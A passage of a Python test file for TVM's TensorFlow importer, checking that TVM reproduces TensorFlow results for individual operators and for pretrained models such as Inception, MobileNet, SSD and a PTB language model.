        ph_a = array_ops.placeholder(shape=shape, dtype="float32", name="pl_a")
        ph_b = array_ops.placeholder(shape=shape, dtype="float32", name="pl_b")
        stacked = tf.stack([ph_a, ph_b], axis=axis, **kwargs)
        # Sanity check that tf.stack really lowered to a Pack op.
        assert stacked.op.op_def.name == "Pack", "tf.stack() is expected to produce 'Pack' operation"
        compare_tf_with_tvm([first, second], ["pl_a:0", "pl_b:0"], "stack:0")
def test_forward_pack():
    """test Pack op via tf.stack over various axes and ranks"""
    for ax in range(-3, 3):
        _test_pack(ax, [3, 2, 1])
    for ax in range(-1, 1):
        _test_pack(ax, [3])
    # Scalar inputs (rank 0).
    _test_pack(0, [])
#######################################################################
# Unpack
# ------
def _test_forward_unpack(in_shape, axis, dtype):
    """One iteration of the Unpack op (tf.unstack with an explicit name)."""
    sample = np.random.uniform(-100, 100, size=in_shape).astype(dtype)
    tf.reset_default_graph()
    with tf.Graph().as_default():
        placeholder = tf.placeholder(dtype, in_shape, name="in_data")
        tf.unstack(placeholder, axis=axis, name="Unpack")
        compare_tf_with_tvm([sample], ["in_data:0"], "Unpack:0")
def test_forward_unpack():
    """test operator Unpack"""
    for shape, axis, dtype in [
        ((3,), 0, "int32"),
        ((3,), -1, "int16"),
        ((21, 23, 3), 2, "float32"),
    ]:
        _test_forward_unpack(shape, axis, dtype)
#######################################################################
# Range
# -----
def test_forward_range():
    """test operator Range, including default dtype assignment"""
    for dtype in [tf.int32, tf.int64]:
        tf.reset_default_graph()
        with tf.Graph().as_default():
            tf.range(1, 18, 3, name="range", dtype=dtype)
            compare_tf_with_tvm([], [], "range:0")

    # Test type assignment for operator Range. (This note was previously a
    # stray string literal in the middle of the function body — a no-op
    # expression statement, not a docstring — now a real comment.)
    tf.reset_default_graph()
    with tf.Graph().as_default():
        tf.range(1, 256 + 1, 1, dtype=tf.float32)
        compare_tf_with_tvm([], [], "range:0")
#######################################################################
# Pad
# ---
def _test_pad(input_shape, paddings, mode, **kwargs):
    """One iteration of a pad operation with the given shape and mode."""
    sample = np.arange(np.prod(input_shape), dtype=np.float32).reshape(input_shape)
    with tf.Graph().as_default():
        in_data = array_ops.placeholder(shape=input_shape, dtype="float32")
        pad_values = constant_op.constant(paddings)
        tf.pad(in_data, paddings=pad_values, mode=mode, **kwargs)
        # TF emits a different op depending on mode / constant_values:
        #   CONSTANT -> Pad, CONSTANT+constant_values -> PadV2, else MirrorPad.
        if mode == "CONSTANT":
            out_name = "PadV2:0" if "constant_values" in kwargs else "Pad:0"
        else:
            out_name = "MirrorPad:0"
        compare_tf_with_tvm(sample, "Placeholder:0", out_name)
def test_forward_pad():
    """Pad"""
    _test_pad((2, 3), [[1, 1], [2, 2]], mode="CONSTANT")
    _test_pad((2, 3), [[1, 1], [2, 2]], mode="CONSTANT", constant_values=1.0)
    _test_pad((2, 3), [[1, 1], [2, 2]], mode="SYMMETRIC")
    _test_pad((2, 3), [[1, 1], [2, 2]], mode="REFLECT")
#######################################################################
# Logical operators
# --------------------
def test_logical_and():
    """Elementwise logical AND of two random boolean tensors."""
    with tf.Graph().as_default():
        lhs = tf.placeholder(tf.bool, shape=[1, 4, 4, 3], name="in1")
        rhs = tf.placeholder(tf.bool, shape=[1, 4, 4, 3], name="in2")
        tf.logical_and(lhs, rhs, name="out")
        data1 = np.random.choice(a=[False, True], size=(1, 4, 4, 3)).astype("bool")
        data2 = np.random.choice(a=[False, True], size=(1, 4, 4, 3)).astype("bool")
        compare_tf_with_tvm([data1, data2], ["in1:0", "in2:0"], "out:0")
def test_logical_or():
    """Elementwise logical OR of two random boolean tensors."""
    with tf.Graph().as_default():
        lhs = tf.placeholder(tf.bool, shape=[1, 4, 4, 3], name="in1")
        rhs = tf.placeholder(tf.bool, shape=[1, 4, 4, 3], name="in2")
        tf.logical_or(lhs, rhs, name="out")
        data1 = np.random.choice(a=[False, True], size=(1, 4, 4, 3)).astype("bool")
        data2 = np.random.choice(a=[False, True], size=(1, 4, 4, 3)).astype("bool")
        compare_tf_with_tvm([data1, data2], ["in1:0", "in2:0"], "out:0")
def test_logical_xor():
    """Elementwise logical XOR of two random boolean tensors."""
    with tf.Graph().as_default():
        lhs = tf.placeholder(tf.bool, shape=[1, 4, 4, 3], name="in1")
        rhs = tf.placeholder(tf.bool, shape=[1, 4, 4, 3], name="in2")
        tf.logical_xor(lhs, rhs, name="out")
        data1 = np.random.choice(a=[False, True], size=(1, 4, 4, 3)).astype("bool")
        data2 = np.random.choice(a=[False, True], size=(1, 4, 4, 3)).astype("bool")
        compare_tf_with_tvm([data1, data2], ["in1:0", "in2:0"], "out:0")
def test_logical_not():
    """Elementwise logical NOT of a random boolean tensor."""
    with tf.Graph().as_default():
        operand = tf.placeholder(tf.bool, shape=[1, 4, 4, 3], name="in1")
        tf.logical_not(operand, name="out")
        data = np.random.choice(a=[False, True], size=(1, 4, 4, 3)).astype("bool")
        compare_tf_with_tvm(data, "in1:0", "out:0")
def test_forward_logical():
    """Run all logical-op tests."""
    for check in (test_logical_and, test_logical_or, test_logical_xor, test_logical_not):
        check()
#######################################################################
# Where, Select
# -------------
def test_forward_where():
    """Where/Select: return elements from two tensors based on a comparison mask."""
    with tf.Graph().as_default():
        # The session context is kept from the original, though it is not
        # used directly here.
        with tf.Session():
            lhs = tf.placeholder(tf.int32, shape=[1, 4, 4, 3], name="input1")
            rhs = tf.placeholder(tf.int32, shape=[1, 4, 4, 3], name="input2")
            mask = lhs > rhs
            tf.where(mask, lhs + 1, rhs * 2)
            data1 = np.random.uniform(0, 10, size=(1, 4, 4, 3)).astype("uint32")
            data2 = np.random.uniform(0, 10, size=(1, 4, 4, 3)).astype("uint32")
            compare_tf_with_tvm([data1, data2], ["input1:0", "input2:0"], "Select:0")
#######################################################################
# Inception V3
# ------------
def test_forward_inception_v3():
    """test inception V3 model"""
    with tf.Graph().as_default():
        graph_def = tf_testing.get_workload(
            "InceptionV3/inception_v3_2016_08_28_frozen-with_shapes.pb"
        )
        # Import the graph definition into the default graph.
        graph_def = tf_testing.ProcessGraphDefParam(graph_def)
        sample = np.random.uniform(size=(1, 299, 299, 3)).astype("float32")
        with tf.Session() as sess:
            tf_output = run_tf_graph(sess, sample, "input:0", "InceptionV3/Predictions/Reshape_1:0")
            tvm_output = run_tvm_graph(graph_def, sample, "input")
            tvm.testing.assert_allclose(tf_output[0], tvm_output[0], rtol=1e-5, atol=1e-5)
#######################################################################
# Inception V1
# ------------
def test_forward_inception_v1():
    """test inception V1 model

    Feeds a JPEG through the graph's DecodeJpeg path: TF decodes the image,
    and the decoded frame is then used as TVM's input.
    """
    with tf.Graph().as_default():
        graph_def = tf_testing.get_workload("InceptionV1/classify_image_graph_def-with_shapes.pb")
        # Call the utility to import the graph definition into default graph.
        graph_def = tf_testing.ProcessGraphDefParam(graph_def)

        # Build an image from random data and round-trip it through a JPEG
        # file so DecodeJpeg gets realistic bytes.
        from PIL import Image
        from tvm.contrib import utils

        img_array = np.random.uniform(size=(1, 600, 600, 3)).astype("uint8")
        # FIX: ndarray.tostring() is deprecated (removed in NumPy 2.0);
        # tobytes() returns the identical byte string.
        img = Image.frombuffer("RGB", (600, 600), img_array.tobytes(), "raw", "RGB", 0, 1)
        temp = utils.tempdir()
        img_path = temp.relpath("tf-test.jpg")
        img.save(img_path)

        import os.path

        if not tf.gfile.Exists(os.path.join(img_path)):
            tf.logging.fatal("File does not exist %s", img_path)
        data = tf.gfile.FastGFile(os.path.join(img_path), "rb").read()
        temp.remove()

        # Extract tensorflow decoded image frame for tvm input.
        with tf.Session() as sess:
            tvm_data = run_tf_graph(sess, data, "DecodeJpeg/contents:0", "DecodeJpeg:0")

        with tf.Session() as sess:
            tf_output = run_tf_graph(sess, data, "DecodeJpeg/contents:0", "softmax:0")
            tvm_output = run_tvm_graph(graph_def, tvm_data, "DecodeJpeg/contents")
            tvm.testing.assert_allclose(tf_output[0], tvm_output[0], rtol=1e-5, atol=1e-5)
#######################################################################
# Mobilenet
# ---------
def test_forward_mobilenet():
    """test mobilenet model (MobilenetV2)"""
    with tf.Graph().as_default():
        graph_def = tf_testing.get_workload(
            "https://storage.googleapis.com/mobilenet_v2/checkpoints/mobilenet_v2_1.4_224.tgz",
            "mobilenet_v2_1.4_224_frozen.pb",
        )
        # Import the graph definition into the default graph.
        graph_def = tf_testing.ProcessGraphDefParam(graph_def)
        sample = np.random.uniform(size=(1, 224, 224, 3)).astype("float32")
        out_node = "MobilenetV2/Predictions/Reshape_1"
        with tf.Session() as sess:
            # Attach inferred shapes to the graph before conversion.
            graph_def = tf_testing.AddShapesToGraphDef(sess, out_node)
            tf_output = run_tf_graph(sess, sample, "input:0", out_node + ":0")
            tvm_output = run_tvm_graph(graph_def, sample, "input")
            tvm.testing.assert_allclose(
                np.squeeze(tvm_output[0]), np.squeeze(tf_output[0]), rtol=1e-5, atol=1e-5
            )
#######################################################################
# ResnetV2
# --------
@tvm.testing.requires_gpu
def test_forward_resnetv2():
    """test resnet model"""
    if not is_gpu_available():
        return
    with tf.Graph().as_default():
        graph_def = tf_testing.get_workload(
            "ResnetV2/resnet-20180601_resnet_v2_imagenet-shapes.pb"
        )
        # Import the graph definition into the default graph.
        graph_def = tf_testing.ProcessGraphDefParam(graph_def)
        sample = np.random.uniform(size=(128, 224, 224, 3)).astype("float32")
        out_node = "ArgMax"
        with tf.Session() as sess:
            tf_output = run_tf_graph(sess, sample, "input_tensor:0", out_node + ":0")
            for target in ["llvm", "cuda"]:
                dev = tvm.device(target, 0)
                if not tvm.testing.device_enabled(target):
                    print("Skip because %s is not enabled" % target)
                    continue
                tvm_output = run_tvm_graph(
                    graph_def, sample, "input_tensor", len(tf_output), target=target
                )
                tvm.testing.assert_allclose(
                    np.squeeze(tvm_output[0]), np.squeeze(tf_output[0]), rtol=1e-5, atol=1e-5
                )
#######################################################################
# SSD
# ---
def _test_ssd_impl():
    """Compare the SSD model (MobileNet V1 backbone) between TF and TVM."""
    with tf.Graph().as_default():
        graph_def = tf_testing.get_workload(
            "object_detection/ssd_mobilenet_v1_ppn_shared_"
            "box_predictor_300x300_coco14_sync_2018_07_03.pb"
        )
        # Import the frozen graph definition into the default graph.
        graph_def = tf_testing.ProcessGraphDefParam(graph_def)
        image = np.random.uniform(0.0, 255.0, size=(1, 512, 512, 3)).astype("uint8")
        in_node = "image_tensor"
        out_node = ["detection_boxes", "detection_scores", "detection_classes"]
        with tf.Session() as sess:
            tf_output = run_tf_graph(
                sess, image, "{}:0".format(in_node), ["{}:0".format(oname) for oname in out_node]
            )
            # TODO(kevinthesun): enable gpu test when VM heterogeneous execution is ready.
            for target_name in ["llvm"]:
                tvm.device(target_name, 0)
                if not tvm.testing.device_enabled(target_name):
                    print("Skip because %s is not enabled" % target_name)
                    continue
                tvm_output = run_tvm_graph(
                    graph_def,
                    image,
                    in_node,
                    len(out_node),
                    target=target_name,
                    layout="NCHW",
                    out_names=out_node,
                    mode="vm",
                    disabled_pass=["FoldScaleAxis"],
                    serialize=True,
                )
                for idx, _ in enumerate(out_node):
                    tvm.testing.assert_allclose(
                        tvm_output[idx], tf_output[idx], rtol=1e-3, atol=1e-3
                    )
def test_forward_ssd():
    """Run the SSD comparison on a worker thread with an enlarged stack."""
    # The SSD conversion is recursion-heavy, so give the worker a 100 MB stack.
    worker = threading.Thread(target=_test_ssd_impl, args=())
    previous_stack_size = threading.stack_size(100 * 1024 * 1024)
    worker.start()
    worker.join()
    # Restore the process-wide default stack size for later threads.
    threading.stack_size(previous_stack_size)
#######################################################################
# Placeholder
# -----------
def test_forward_placeholder():
    """A pb whose GraphDef ends with a Placeholder node must still import."""
    with tf.Graph().as_default():
        graph_def = tf_testing.get_workload("Custom/placeholder.pb")
        # Import the frozen graph definition into the default graph.
        graph_def = tf_testing.ProcessGraphDefParam(graph_def)
        input_values = np.random.uniform(size=(1, 224, 224, 3)).astype("float32")
        output_name = "mul"
        with tf.Session() as sess:
            # Attach shape information before handing the graph to TVM.
            graph_def = tf_testing.AddShapesToGraphDef(sess, output_name)
            tf_result = run_tf_graph(sess, input_values, "Placeholder:0", output_name + ":0")
            tvm_result = run_tvm_graph(graph_def, input_values, "Placeholder")
            tvm.testing.assert_allclose(
                np.squeeze(tvm_result[0]), np.squeeze(tf_result[0]), rtol=1e-5, atol=1e-5
            )
#######################################################################
# PTB
# ---
# Load contrib so LSTMBlockCell is registered when running the PTB model on
# TF versions before 2.0; on newer TF the module no longer exists and the
# import is simply skipped.  Catch only ImportError — a bare `except` would
# also swallow KeyboardInterrupt/SystemExit and unrelated import-time errors.
try:
    import tensorflow.contrib
except ImportError:
    pass
def test_forward_ptb():
    """test ptb model

    Run the pretrained PTB LSTM language model through both TF and TVM,
    sample a continuation of ``cnt_sample`` tokens from each, and require
    the sampled token ids (and their pretty-printed strings) to match.
    """
    config = tf_testing.get_config()
    num_steps = config.num_steps
    num_hidden = config.hidden_size
    num_layers = config.num_layers
    batch_size = config.batch_size
    vocab_size = config.vocab_size
    # Output 0 is a softmax over the vocabulary; outputs 1..4 are LSTM state.
    out_sample_shape = (batch_size, vocab_size)
    out_state_shape = (batch_size, num_hidden)
    # Sample input
    inpt = "we have no useful information on"
    cnt_sample = 20
    def _pretty_print(items, is_char_model, id2word):
        # Word-level models join tokens with spaces; char-level models use
        # "_" as the space placeholder instead.
        if not is_char_model:
            return " ".join([id2word[x] for x in items])
        else:
            return "".join([id2word[x] for x in items]).replace("_", " ")
    def _get_tvm_graph_module(graph_def):
        # Build a TVM graph-executor module from the frozen TF graph,
        # exposing the softmax plus all four LSTM state outputs.
        # Cell inputs 'c and 'h' consist of all layers values
        shape_dict = {"Model/Placeholder": (batch_size, num_steps)}
        mod, params = relay.frontend.from_tensorflow(
            graph_def,
            shape=shape_dict,
            outputs=[
                "Model/Softmax:0",
                "Model/RNN/RNN/multi_rnn_cell/cell_0/lstm_cell/LSTMBlockCell:1",
                "Model/RNN/RNN/multi_rnn_cell/cell_0/lstm_cell/LSTMBlockCell:6",
                "Model/RNN/RNN/multi_rnn_cell/cell_0/lstm_cell/LSTMBlockCell_1:1",
                "Model/RNN/RNN/multi_rnn_cell/cell_0/lstm_cell/LSTMBlockCell_1:6",
            ],
        )
        target = "llvm"
        # opt_level=0 keeps the build simple and deterministic for this test.
        with tvm.transform.PassContext(opt_level=0):
            graph, lib, params = relay.build(mod, target, params=params)
        from tvm.contrib import graph_executor
        dev = tvm.cpu(0)
        return params, graph_executor.create(graph, lib, dev)
    def _do_tvm_sample(model, data, in_states, params, num_samples):
        """Sampled from the model

        Consume the seed token ids in ``data``, then keep feeding the
        model's own previous sample back in until ``num_samples`` tokens
        have been produced.  Returns (samples, final_state).
        """
        samples = []
        state = in_states
        sample = None
        def _get_sample(data, state):
            # One step: feed the current token (replicated across the whole
            # (batch, num_steps) input) plus the four LSTM state tensors,
            # run, and sample the next token from the softmax output.
            input_data = np.full((batch_size, num_steps), data, dtype="int32")
            model.set_input("Model/Placeholder", tvm.nd.array(input_data.astype("int32")))
            model.set_input(
                "Model/MultiRNNCellZeroState/LSTMBlockCellZeroState/zeros",
                tvm.nd.array(state[0].astype("float32")),
            )
            model.set_input(
                "Model/MultiRNNCellZeroState/LSTMBlockCellZeroState/zeros_1",
                tvm.nd.array(state[1].astype("float32")),
            )
            model.set_input(
                "Model/MultiRNNCellZeroState/LSTMBlockCellZeroState_1/zeros",
                tvm.nd.array(state[2].astype("float32")),
            )
            model.set_input(
                "Model/MultiRNNCellZeroState/LSTMBlockCellZeroState_1/zeros_1",
                tvm.nd.array(state[3].astype("float32")),
            )
            model.set_input(**params)
            model.run()
            tvm_output = model.get_output(0, tvm.nd.empty(out_sample_shape, "float32")).asnumpy()
            # Outputs 1..4 are the updated LSTM states, fed back next step.
            state_output = []
            for i in range(4):
                state_output.append(
                    model.get_output(i + 1, tvm.nd.empty(out_state_shape, "float32")).asnumpy()
                )
            sample = tf_testing.pick_from_weight(tvm_output[0])
            return sample, state_output
        # First consume the seed tokens; only the final seed's sample is kept.
        for x in data:
            sample, state = _get_sample(x, state)
        if sample is not None:
            samples.append(sample)
        else:
            samples.append(0)
        # Then continue sampling from the model's own previous output.
        k = 1
        while k < num_samples:
            sample, state = _get_sample(samples[-1], state)
            samples.append(sample)
            k += 1
        return samples, state
    with tf.Graph().as_default():
        word_to_id, id_to_word, graph_def = tf_testing.get_workload_ptb()
        vocab_size = len(word_to_id)
        # Call the utility to import the graph definition into default graph.
        graph_def = tf_testing.ProcessGraphDefParam(graph_def)
        sess = tf.Session()
        # TVM graph module creation
        params, m = _get_tvm_graph_module(graph_def)
        # Create 10 predicted statments of 20 words
        cnt_stm = 0
        while cnt_stm < 10:
            cnt_stm += 1
            # Fresh zero state (c and h for each layer) for every statement.
            in_state = [np.full((batch_size, num_hidden), 0, dtype="float32")] * 2 * num_layers
            seed_for_sample = inpt.split()
            tvm_samples, tvm_state = _do_tvm_sample(
                m, [word_to_id[word] for word in seed_for_sample], in_state, params, cnt_sample
            )
            tvm_sample_str = _pretty_print(tvm_samples, False, id_to_word)
            # Reference sampling through TF with the same seed and state.
            tf_samples, tf_state = tf_testing.do_tf_sample(
                sess, [word_to_id[word] for word in seed_for_sample], in_state, cnt_sample
            )
            tf_sample_str = _pretty_print(tf_samples, False, id_to_word)
            # Feed each sampled sentence back in as the next statement's seed.
            inpt = tvm_sample_str
            tvm.testing.assert_allclose(tf_samples, tvm_samples, rtol=1e-5, atol=1e-5)
            assert tvm_sample_str == tf_sample_str
#######################################################################
# LRN (Local Response Normalization)
# ----------------------------------
def _test_lrn(ishape, size, axis, bias, alpha, beta):
    """Compare TF local-response-normalization with TVM for one setting."""
    # depth_radius is half the window size (float division, as TF accepts it).
    lrn_depth_radius = size / 2
    input_values = np.random.uniform(size=ishape).astype(np.float32)
    with tf.Graph().as_default():
        placeholder = tf.placeholder(
            shape=input_values.shape, dtype=input_values.dtype, name="lrn0_data"
        )
        nn_ops.local_response_normalization(
            placeholder, name="lrn", depth_radius=lrn_depth_radius, bias=bias, alpha=alpha, beta=beta
        )
        compare_tf_with_tvm(input_values, "lrn0_data:0", "lrn:0")
def test_forward_lrn():
    """LRN with a 3-wide window over a (1, 3, 20, 20) input."""
    _test_lrn((1, 3, 20, 20), size=3, axis=1, bias=1.0, alpha=1.0, beta=0.5)
#######################################################################
# l2_normalize
# ------------
def _test_l2_normalize(ishape, eps, axis):
    """Compare l2_normalize (max/sum/square/sqrt frontend ops) with TVM."""
    input_values = np.random.uniform(size=ishape).astype(np.float32)
    with tf.Graph().as_default():
        placeholder = tf.placeholder(shape=input_values.shape, dtype=input_values.dtype)
        nn.l2_normalize(placeholder, axis=axis, epsilon=eps, name=None, dim=None)
        compare_tf_with_tvm(input_values, "Placeholder:0", "l2_normalize:0")
def test_forward_l2_normalize():
    """L2 normalization along axis 0 of a 4-D tensor."""
    _test_l2_normalize((1, 3, 20, 20), eps=0.001, axis=(0,))
#######################################################################
# transpose
# ---------
def _test_forward_transpose(ishape, axes=None):
    """Compare tf.transpose (default or explicit permutation) with TVM."""
    input_values = np.random.uniform(size=ishape).astype(np.float32)
    with tf.Graph().as_default():
        placeholder = tf.placeholder(
            shape=input_values.shape, dtype=input_values.dtype, name="transpose_data"
        )
        if axes is None:
            # Default permutation reverses all dimensions.
            tf.transpose(placeholder)
        else:
            tf.transpose(placeholder, perm=axes)
        compare_tf_with_tvm(input_values, "transpose_data:0", "transpose:0")
def _test_forward_tranapose_axes_input(ishape, axes):
    """Transpose whose permutation is itself a tensor in the graph."""
    input_values = np.random.uniform(size=ishape).astype(np.float32)
    perm_np = np.array(axes).astype(np.int32)
    with tf.Graph().as_default():
        placeholder = tf.placeholder(
            shape=input_values.shape, dtype=input_values.dtype, name="transpose_data"
        )
        perm_const = tf.constant(perm_np, dtype=tf.int32)
        # make axes an input to tf.transpose, but not an input to the graph,
        # so it can be extracted with infer_value_simulated
        perm_tensor = tf.reverse(perm_const, axis=[-1])
        tf.transpose(placeholder, perm_tensor)
        compare_tf_with_tvm([input_values], ["transpose_data:0"], "transpose:0")
def test_forward_transpose():
    """Transpose with implicit/explicit permutations, plus permutation given
    as an in-graph tensor.  (A duplicated ((2, 3, 4), (1, 2, 0)) invocation
    was removed — it ran the identical case twice.)"""
    _test_forward_transpose((2, 3, 4), (1, 2, 0))
    _test_forward_transpose((2, 3, 4))
    _test_forward_transpose((7, 8, 8, 10))
    _test_forward_transpose((2, 3, 4), (0, 1, 2))
    _test_forward_transpose((2, 3, 4, 5), (3, 0, 1, 2))
    _test_forward_tranapose_axes_input((2, 3, 4), (1, 2, 0))
    _test_forward_tranapose_axes_input((2, 3, 4, 5), (3, 0, 1, 2))
def _test_forward_slice_operation_input(input_value, begin_value, size_value):
    """Compare tf.slice with the given begin/size against TVM."""
    data = np.array(input_value, dtype=np.float32)
    with tf.Graph().as_default():
        placeholder = tf.placeholder(shape=data.shape, dtype=data.dtype, name="input")
        tf.slice(placeholder, begin_value, size_value, name="slice_output")
        compare_tf_with_tvm([data], ["input:0"], "slice_output:0")
def test_forward_slice():
    """Slice with positive sizes and the -1 "to the end" sentinel."""
    _test_forward_slice_operation_input([1, 1], begin_value=[0], size_value=[2])
    _test_forward_slice_operation_input([0, 1, 2, 3], begin_value=[3], size_value=[-1])
    _test_forward_slice_operation_input(
        [[0, 1, 2, 3], [4, 5, 6, 7]], begin_value=[0, 1], size_value=[-1, -1]
    )
def test_forward_ceil():
    """Elementwise Ceil must round-trip through the importer."""
    shape = (1, 3, 10, 10)
    values = np.random.uniform(size=shape).astype(np.float32)
    with tf.Graph().as_default():
        placeholder = tf.placeholder(shape=values.shape, dtype=values.dtype)
        tf.ceil(placeholder)
        compare_tf_with_tvm(values, "Placeholder:0", "Ceil:0")
def test_forward_floor():
    """Elementwise Floor must round-trip through the importer."""
    shape = (1, 3, 10, 10)
    values = np.random.uniform(size=shape).astype(np.float32)
    with tf.Graph().as_default():
        placeholder = tf.placeholder(shape=values.shape, dtype=values.dtype)
        tf.floor(placeholder)
        compare_tf_with_tvm(values, "Placeholder:0", "Floor:0")
def test_forward_relu():
    """ReLU on mixed-sign input, via both graph executor and VM."""
    shape = (1, 3, 10, 10)
    values = np.random.uniform(-5, 5, size=shape).astype(np.float32)
    for mode in ["graph_executor", "vm"]:
        with tf.Graph().as_default():
            placeholder = tf.placeholder(shape=values.shape, dtype=values.dtype)
            tf.nn.relu(placeholder)
            compare_tf_with_tvm(values, "Placeholder:0", "Relu:0", mode=mode)
def test_forward_leaky_relu():
    """LeakyReLU (alpha=0.4), via both graph executor and VM."""
    shape = (1, 3, 10, 10)
    values = np.random.uniform(-5, 5, size=shape).astype(np.float32)
    for mode in ["graph_executor", "vm"]:
        with tf.Graph().as_default():
            placeholder = tf.placeholder(shape=values.shape, dtype=values.dtype)
            tf.nn.leaky_relu(placeholder, alpha=0.4)
            compare_tf_with_tvm(values, "Placeholder:0", "LeakyRelu:0", mode=mode)
def test_forward_elu():
    """ELU on mixed-sign input must round-trip through the importer."""
    shape = (1, 3, 10, 10)
    values = np.random.uniform(-5, 5, size=shape).astype(np.float32)
    with tf.Graph().as_default():
        placeholder = tf.placeholder(shape=values.shape, dtype=values.dtype)
        tf.nn.elu(placeholder)
        compare_tf_with_tvm(values, "Placeholder:0", "Elu:0")
def test_forward_selu():
    """SELU on mixed-sign input must round-trip through the importer."""
    shape = (1, 3, 10, 10)
    values = np.random.uniform(-5, 5, size=shape).astype(np.float32)
    with tf.Graph().as_default():
        placeholder = tf.placeholder(shape=values.shape, dtype=values.dtype)
        tf.nn.selu(placeholder)
        compare_tf_with_tvm(values, "Placeholder:0", "Selu:0")
def test_forward_tanh():
    """Tanh on mixed-sign input must round-trip through the importer."""
    shape = (1, 3, 10, 10)
    values = np.random.uniform(-5, 5, size=shape).astype(np.float32)
    with tf.Graph().as_default():
        placeholder = tf.placeholder(shape=values.shape, dtype=values.dtype)
        tf.nn.tanh(placeholder)
        compare_tf_with_tvm(values, "Placeholder:0", "Tanh:0")
#######################################################################
# Softmax
# -------
def test_forward_softmax():
    """Softmax along different axes must match between TF and TVM."""

    def check_softmax(in_shape, axis, dtype):
        data = np.random.uniform(-100, 100, size=in_shape).astype(dtype)
        tf.reset_default_graph()
        with tf.Graph().as_default():
            placeholder = tf.placeholder(dtype, in_shape, name="in_data")
            tf.nn.softmax(placeholder, axis=axis, name="Softmax")
            compare_tf_with_tvm([data], ["in_data:0"], "Softmax:0")

    check_softmax((2, 3, 5), 2, "float32")
    check_softmax((2, 3, 5), -1, "float32")
#######################################################################
# Tensor
# ------
def test_forward_round():
    """Elementwise Round must round-trip through the importer."""
    data = np.random.uniform(-10, 10, size=(5, 7)).astype(np.float32)
    tf.reset_default_graph()
    with tf.Graph().as_default():
        placeholder = tf.placeholder(tf.float32, (5, 7), name="in_data")
        tf.round(placeholder, name="round")
        compare_tf_with_tvm([data], ["in_data:0"], "round:0")
def test_forward_abs():
    """Elementwise Abs must round-trip through the importer."""
    data = np.random.uniform(1, 100, size=(9, 11)).astype(np.float32)
    tf.reset_default_graph()
    with tf.Graph().as_default():
        placeholder = tf.placeholder(tf.float32, (9, 11), name="in_data")
        tf.math.abs(placeholder, name="abs")
        compare_tf_with_tvm([data], ["in_data:0"], "abs:0")
def _test_forward_zeros_like(in_shape, dtype):
    """Compare tf.zeros_like for one shape/dtype against TVM."""
    data = np.random.uniform(-10, 10, size=in_shape).astype(dtype)
    tf.reset_default_graph()
    with tf.Graph().as_default():
        placeholder = tf.placeholder(dtype, in_shape, name="in_data")
        tf.zeros_like(placeholder, name="zeros_like")
        compare_tf_with_tvm([data], ["in_data:0"], "zeros_like:0")
def test_forward_zeros_like():
    """test ZerosLike over several shapes and dtypes."""
    # NOTE(review): this guard runs the checks only on TF older than 1.2, so
    # on any modern TF the whole body is skipped — confirm whether the
    # comparison was meant to be inverted (>=).
    if tf.__version__ < LooseVersion("1.2"):
        _test_forward_zeros_like((2, 3), "int32")
        _test_forward_zeros_like((2, 3, 5), "int8")
        _test_forward_zeros_like((2, 3, 5, 7), "uint16")
        _test_forward_zeros_like((2, 3, 11), "float32")
        _test_forward_zeros_like((2, 3, 11), "float64")
def test_forward_squared_difference():
    """Elementwise (a - b)**2 must round-trip through the importer."""
    shape = (1, 3, 10, 14)
    lhs_values = np.random.uniform(-5, 5, size=shape).astype(np.float32)
    rhs_values = np.random.uniform(-5, 5, size=shape).astype(np.float32)
    with tf.Graph().as_default():
        lhs = tf.placeholder(shape=lhs_values.shape, dtype=lhs_values.dtype, name="in1")
        rhs = tf.placeholder(shape=rhs_values.shape, dtype=rhs_values.dtype, name="in2")
        result = tf.math.squared_difference(lhs, rhs)
        compare_tf_with_tvm([lhs_values, rhs_values], [lhs.name, rhs.name], result.name)
def _test_forward_reverse_v2(in_shape, axis, dtype):
    """Compare tf.reverse along one axis against TVM."""
    data = np.random.uniform(-10, 10, size=in_shape).astype(dtype)
    tf.reset_default_graph()
    with tf.Graph().as_default():
        placeholder = tf.placeholder(dtype, in_shape, name="in_data")
        tf.reverse(placeholder, axis=[axis], name="reverse")
        compare_tf_with_tvm([data], ["in_data:0"], "reverse:0")
def test_forward_reverse_v2():
    """test ReverseV2 with positive and negative axes, several dtypes."""
    for shape, axis, dtype in (
        ((2, 3), 0, "int32"),
        ((2, 3, 5), 2, "float32"),
        ((2, 3, 5, 7), 1, "float32"),
        ((2, 3, 5), -1, "float64"),
        ((2, 3, 5), -3, "float64"),
    ):
        _test_forward_reverse_v2(shape, axis, dtype)
def test_forward_sign():
    """Elementwise Sign must round-trip through the importer."""
    data = np.random.uniform(-10, 10, size=(5, 7, 11)).astype(np.float32)
    tf.reset_default_graph()
    with tf.Graph().as_default():
        placeholder = tf.placeholder(tf.float32, (5, 7, 11), name="in_data")
        tf.sign(placeholder, name="sign")
        compare_tf_with_tvm([data], ["in_data:0"], "sign:0")
def test_forward_square():
    """Elementwise Square must round-trip through the importer."""
    data = np.random.uniform(1, 100, size=(2, 3, 5)).astype(np.float32)
    tf.reset_default_graph()
    with tf.Graph().as_default():
        placeholder = tf.placeholder(tf.float32, (2, 3, 5), name="in_data")
        tf.square(placeholder, name="square")
        compare_tf_with_tvm([data], ["in_data:0"], "square:0")
def test_forward_pow_exp():
    """test Pow and Exp"""
    np_in1 = np.random.uniform(-2, 2, size=(5, 7, 11)).astype(np.float32)
    np_in2 = np.random.uniform(-2, 2, size=(5, 7, 11)).astype(np.float32)
    tf.reset_default_graph()
    with tf.Graph().as_default():
        in1 = tf.placeholder(tf.float32, (5, 7, 11), name="in1")
        in2 = tf.placeholder(tf.float32, (5, 7, 11), name="in2")
        # Results are looked up by node name below, so the Python return
        # values of the op constructors are not needed (dropped unused
        # locals `out1`/`out`).
        tf.pow(in1, in2, name="pow")
        tf.exp(in1, name="exp")
        compare_tf_with_tvm([np_in1, np_in2], ["in1:0", "in2:0"], "pow:0")
        compare_tf_with_tvm([np_in1], ["in1:0"], "exp:0")
def test_forward_unary():
    """Elementwise unary math ops must round-trip through the importer."""

    def _check(op, a_min=1, a_max=5, dtype=np.float32):
        data = np.random.uniform(a_min, a_max, size=(2, 3, 5)).astype(dtype)
        tf.reset_default_graph()
        with tf.Graph().as_default():
            placeholder = tf.placeholder(dtype, (2, 3, 5), name="in_data")
            result = op(placeholder)
            compare_tf_with_tvm([data], ["in_data:0"], result.name)

    # (op, low, high) — ops with restricted domains get matching ranges.
    for op, lo, hi in (
        (tf.acos, -1, 1),
        (tf.asin, -1, 1),
        (tf.atanh, -1, 1),
        (tf.sinh, 1, 5),
        (tf.cosh, 1, 5),
        (tf.acosh, 1, 5),
        (tf.asinh, 1, 5),
        (tf.atan, 1, 5),
        (tf.sin, 1, 5),
